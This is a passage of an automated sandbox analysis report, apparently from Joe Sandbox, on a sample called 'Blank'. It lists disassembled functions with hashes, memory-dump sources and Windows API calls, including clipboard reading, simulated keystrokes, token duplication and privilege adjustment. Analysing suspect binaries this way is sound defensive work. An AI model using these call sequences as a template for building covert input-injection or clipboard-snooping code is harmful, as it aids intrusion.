                                                                                                                                    • Instruction ID: ac87f992954eac45333dc3695d4ce093f3a368333da924078a35a4e371b0e508
                                                                                                                                    • Opcode Fuzzy Hash: 8e2aa1164b480ee57adb8bca26fd0d8aeed69d82757a4e1f427a91ec176694ab
                                                                                                                                    • Instruction Fuzzy Hash: 7801D6B1F0021C5ADB24EA25EC46AEF7768DB85308F1401AEA605E21C1E9785E85CAD8
                                                                                                                                    Function 0043566A Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c1e66a0d9291ff3852b7377b26da65c4eea7d72fbc18c85fb2d5dde3eb433010
                                                                                                                                    • Instruction ID: 2bfa2d47e689cb92b471c2765cc2a90d064484eb34f0e258fff3295a170c0357
                                                                                                                                    • Opcode Fuzzy Hash: c1e66a0d9291ff3852b7377b26da65c4eea7d72fbc18c85fb2d5dde3eb433010
                                                                                                                                    • Instruction Fuzzy Hash: 4951F931A00644EFDB10DF28CC45AAE7BF5EF89364F19916AE8099B392C735DD42CB94
                                                                                                                                    Function 00403CA0 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                    • Opcode ID: eae5028f505ab7442a9808acb7cce8140f6239f0803ef54db50fa7d4ba73fa17
                                                                                                                                    • Instruction ID: c23613a4d441cc1750f51f0134f457c0ca29294bd05563490ff7261f22875a22
                                                                                                                                    • Opcode Fuzzy Hash: eae5028f505ab7442a9808acb7cce8140f6239f0803ef54db50fa7d4ba73fa17
                                                                                                                                    • Instruction Fuzzy Hash: 2B318A31608716ABD714DF29C880A1ABBA8FF84351F04853FFC54A7391D779EA148B8A
                                                                                                                                    Function 0040290C Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004029EF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 323602529-0
                                                                                                                                    • Opcode ID: 3944634dbafdf4a1c89f62f8675f8e4da03db77c5c810cc256f7c6bcf0ee6547
                                                                                                                                    • Instruction ID: ee8dfd299f69fca791813fc58fa7690d4dfebb2bec6c37be3ad796024bcb7243
                                                                                                                                    • Opcode Fuzzy Hash: 3944634dbafdf4a1c89f62f8675f8e4da03db77c5c810cc256f7c6bcf0ee6547
                                                                                                                                    • Instruction Fuzzy Hash: 1C312BB4D002199FCB14EFA5C891AEDBBB4BF44304F50C46EE419B3281DB786A88CF94
                                                                                                                                    Function 00404953 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog3_catch
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3886170330-0
                                                                                                                                    • Opcode ID: c8a354aa6c1a0156b5c9a441c6127cff27ecd0ab0107bb5511494e3c18f2cbfe
                                                                                                                                    • Instruction ID: cea30f256e6dde424a0f27302bc6fa05b3b161f17eead6c7b4ae850b7adc2ef1
                                                                                                                                    • Opcode Fuzzy Hash: c8a354aa6c1a0156b5c9a441c6127cff27ecd0ab0107bb5511494e3c18f2cbfe
                                                                                                                                    • Instruction Fuzzy Hash: 59214CB0600255DFCB11DF69C580EAEBBB5BF88704F14816EE9146B352C778AE90DF94
                                                                                                                                    Function 00433BD9 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                    • Opcode ID: 18e7d76bc77c5919e6bb077ebdc35a1b6d93fe389318b1b492601ac11fd6f26a
                                                                                                                                    • Instruction ID: 4c744303d2ad4297a5f5f14d9b2c9388c0d999bb59588f45d22f30cfbbcf6598
                                                                                                                                    • Opcode Fuzzy Hash: 18e7d76bc77c5919e6bb077ebdc35a1b6d93fe389318b1b492601ac11fd6f26a
                                                                                                                                    • Instruction Fuzzy Hash: 97115AB690420AAFDF05DF59E94199B7BF4EF48304F0040AAF809AB311D731EA11CBA9
                                                                                                                                    Function 0043E577 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                    • Opcode ID: 30a6daa0cfb35300580b58883949daa425dc177b79cd4a227c8d843442229c51
                                                                                                                                    • Instruction ID: 1ff8e610eb2bde8c866e6739aabf2c183dcb3a241019283d8f08a7506d209bd0
                                                                                                                                    • Opcode Fuzzy Hash: 30a6daa0cfb35300580b58883949daa425dc177b79cd4a227c8d843442229c51
                                                                                                                                    • Instruction Fuzzy Hash: D9F0BE33411008BBDF119ED6DC01CDF3B6DEF8D338F100116FA1492190EA7ADA21A7A5
                                                                                                                                    Function 00434B8B Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,0040E8E1,00000000,?,004278DE,00000002,00000000,00000000,00000000,?,0040DD92,0040E8E1,00000004,00000000,00000000,00000000), ref: 00434BBD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: 39bb886e5801bbfafd863755dc44e6ecdf75ef8ca85d53911b6070e0876175cb
                                                                                                                                    • Instruction ID: 13d973f61c7cc68de8375dd5b0e28bc08f6a456a4245ac7ac3e603ed373355d7
                                                                                                                                    • Opcode Fuzzy Hash: 39bb886e5801bbfafd863755dc44e6ecdf75ef8ca85d53911b6070e0876175cb
                                                                                                                                    • Instruction Fuzzy Hash: E4E0E53520022566F6202A269C00BDBB64CAFCA7B0F102233AC11922D1DB18FC0185ED
                                                                                                                                    Function 00410C43 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00411507
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Exception@8Throw
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2005118841-0
                                                                                                                                    • Opcode ID: d12682cb9bd5bef99ccc2bf66b5c790c0b0d9215b5b5467bf4b5e1013eff04b2
                                                                                                                                    • Instruction ID: 0cbf8253d0eadc967b27a7bb1bd8f921668de3236e3c284cd45d1d2bf26b693c
                                                                                                                                    • Opcode Fuzzy Hash: d12682cb9bd5bef99ccc2bf66b5c790c0b0d9215b5b5467bf4b5e1013eff04b2
                                                                                                                                    • Instruction Fuzzy Hash: C6E0223050020EB29F087A66EC069AE332C6A00364F60423BB918911E1FFB8D9D589DC
                                                                                                                                    Function 0043E2B6 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,0043E691,?,?,00000000,?,0043E691,00000000,0000000C), ref: 0043E2D3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: d5ecc4bb2b1b28999325499a22d4954a718f3307baa010e4d9aa9faf63575e75
                                                                                                                                    • Instruction ID: e868247cd65f1177f3b91b6bd93ad442b251f8925bbc9e71c103e7424a977587
                                                                                                                                    • Opcode Fuzzy Hash: d5ecc4bb2b1b28999325499a22d4954a718f3307baa010e4d9aa9faf63575e75
                                                                                                                                    • Instruction Fuzzy Hash: B0D06C3600010DBBDF128F84DC46EDA3BAAFB48714F014010BA1856020C732E861AB95

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 002ED164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002629E2: GetWindowLongW.USER32(?,000000EB), ref: 002629F3
                                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 002ED208
                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002ED249
                                                                                                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 002ED28E
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002ED2B8
                                                                                                                                    • SendMessageW.USER32 ref: 002ED2E1
                                                                                                                                    • _wcsncpy.LIBCMT ref: 002ED359
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 002ED37A
                                                                                                                                    • GetKeyState.USER32(00000009), ref: 002ED387
                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002ED39D
                                                                                                                                    • GetKeyState.USER32(00000010), ref: 002ED3A7
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002ED3D0
                                                                                                                                    • SendMessageW.USER32 ref: 002ED3F7
                                                                                                                                    • SendMessageW.USER32(?,00001030,?,002EB9BA), ref: 002ED4FD
                                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 002ED513
                                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002ED526
                                                                                                                                    • SetCapture.USER32(?), ref: 002ED52F
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002ED594
                                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002ED5A1
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002ED5BB
                                                                                                                                    • ReleaseCapture.USER32 ref: 002ED5C6
                                                                                                                                    • GetCursorPos.USER32(?), ref: 002ED600
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002ED60D
                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 002ED669
                                                                                                                                    • SendMessageW.USER32 ref: 002ED697
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 002ED6D4
                                                                                                                                    • SendMessageW.USER32 ref: 002ED703
                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002ED724
                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 002ED733
                                                                                                                                    • GetCursorPos.USER32(?), ref: 002ED753
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002ED760
                                                                                                                                    • GetParent.USER32(?), ref: 002ED780
                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 002ED7E9
                                                                                                                                    • SendMessageW.USER32 ref: 002ED81A
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002ED878
                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002ED8A8
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 002ED8D2
                                                                                                                                    • SendMessageW.USER32 ref: 002ED8F5
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002ED947
                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002ED97B
                                                                                                                                      • Part of subcall function 002629AB: GetWindowLongW.USER32(?,000000EB), ref: 002629BC
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002EDA17
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                                    • API String ID: 3977979337-4164748364
                                                                                                                                    • Opcode ID: f996a9d155de75eca420e945fac2fca66c1f67bd38b89480c90ca2d1033e6be2
                                                                                                                                    • Instruction ID: 9c4db420f89b5b6794b424fd004c70453e5564f848345e1843bbbcb38436db57
                                                                                                                                    • Opcode Fuzzy Hash: f996a9d155de75eca420e945fac2fca66c1f67bd38b89480c90ca2d1033e6be2
                                                                                                                                    • Instruction Fuzzy Hash: F542BF702542829FD721DF2AC888FAABBE5FF48350F54051DF6998B2A1C771D864CF52
                                                                                                                                    Function 00275EDA Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00275EE2
                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002B10D7
                                                                                                                                    • IsIconic.USER32(?), ref: 002B10E0
                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 002B10ED
                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 002B10F7
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002B110D
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002B1114
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 002B1120
                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 002B1131
                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 002B1139
                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 002B1141
                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 002B1144
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002B1159
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 002B1164
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002B116E
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 002B1173
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002B117C
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 002B1181
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002B118B
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 002B1190
                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 002B1193
                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 002B11BA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                                    • Opcode ID: fb7679629935cc9d3e314246a72ae15f1642568250655ee27d55f2cb16abe51b
                                                                                                                                    • Instruction ID: 76052cd955c95c05ab717e9e804c6258fc070b9315eb15c4d536afbd6ac67469
                                                                                                                                    • Opcode Fuzzy Hash: fb7679629935cc9d3e314246a72ae15f1642568250655ee27d55f2cb16abe51b
                                                                                                                                    • Instruction Fuzzy Hash: 44318971A503187BFB206F659C89FBF7E6CEB44BA0F504025FA05EA1D1C6B05D61EEA0
                                                                                                                                    Function 002B8F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002B9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002B93E3
                                                                                                                                      • Part of subcall function 002B9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002B9410
                                                                                                                                      • Part of subcall function 002B9399: GetLastError.KERNEL32 ref: 002B941D
                                                                                                                                    • _memset.LIBCMT ref: 002B8F71
                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002B8FC3
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002B8FD4
                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002B8FEB
                                                                                                                                    • GetProcessWindowStation.USER32 ref: 002B9004
                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 002B900E
                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002B9028
                                                                                                                                      • Part of subcall function 002B8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002B8F27), ref: 002B8DFE
                                                                                                                                      • Part of subcall function 002B8DE9: CloseHandle.KERNEL32(?,?,002B8F27), ref: 002B8E10
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                    • String ID: $default$winsta0
                                                                                                                                    • API String ID: 2063423040-1027155976
                                                                                                                                    • Opcode ID: 60c2bf96b3615385e46203b08be5b5f16ca0412dbd5ed657b08f967424058fbb
                                                                                                                                    • Instruction ID: 3bb27ec10387e332991c872720355086052646c5e489d79c0fbebf08eee380c4
                                                                                                                                    • Opcode Fuzzy Hash: 60c2bf96b3615385e46203b08be5b5f16ca0412dbd5ed657b08f967424058fbb
                                                                                                                                    • Instruction Fuzzy Hash: 42814C7182120ABFDF11DFA4DC49AFE7B79BF04394F044169FA18A6262D7318E65EB10
                                                                                                                                    Function 002D4632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • OpenClipboard.USER32(002F0980), ref: 002D465C
                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 002D466A
                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 002D4672
                                                                                                                                    • CloseClipboard.USER32 ref: 002D467E
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 002D469A
                                                                                                                                    • CloseClipboard.USER32 ref: 002D46A4
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002D46B9
                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 002D46C6
                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 002D46CE
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 002D46DB
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002D470F
                                                                                                                                    • CloseClipboard.USER32 ref: 002D481F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3222323430-0
                                                                                                                                    • Opcode ID: c8bbffe60957af3563e0fad31cf76f86cdc30cd11cb91e98246b4709823efa97
                                                                                                                                    • Instruction ID: bbe310af8b96a2f202c6cbd87699b5a3dde504304e744035cca5a022fcf40d2f
                                                                                                                                    • Opcode Fuzzy Hash: c8bbffe60957af3563e0fad31cf76f86cdc30cd11cb91e98246b4709823efa97
                                                                                                                                    • Instruction Fuzzy Hash: 15518031264202ABD311FF64EC89F7E77A8AF84B91F00452AF546D2292DB70DD25CB62
                                                                                                                                    Function 002CF5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,000BDFBA,?,00000000), ref: 002CF5F9
                                                                                                                                    • _wcscmp.LIBCMT ref: 002CF60E
                                                                                                                                    • _wcscmp.LIBCMT ref: 002CF625
                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 002CF637
                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 002CF651
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 002CF669
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002CF674
                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 002CF690
                                                                                                                                    • _wcscmp.LIBCMT ref: 002CF6B7
                                                                                                                                    • _wcscmp.LIBCMT ref: 002CF6CE
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002CF6E0
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(0031B578), ref: 002CF6FE
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002CF708
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002CF715
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002CF727
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                    • String ID: *.*$S,
                                                                                                                                    • API String ID: 1803514871-3066342475
                                                                                                                                    • Opcode ID: 1b7b5333c2e223b633ea7e1d35c21f4908d35542289ca0de047bcefe19a2834f
                                                                                                                                    • Instruction ID: 2977df9e07f77668c3bb046727ae00a51ecff8722ed61ed4b4361c388dfa5ece
                                                                                                                                    • Opcode Fuzzy Hash: 1b7b5333c2e223b633ea7e1d35c21f4908d35542289ca0de047bcefe19a2834f
                                                                                                                                    • Instruction Fuzzy Hash: 8431E57155120A6BDB50DFB4ED8DEEEB3AD9F09361F104279E814D20A1DB30CA64CA60
                                                                                                                                    Function 002CCD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
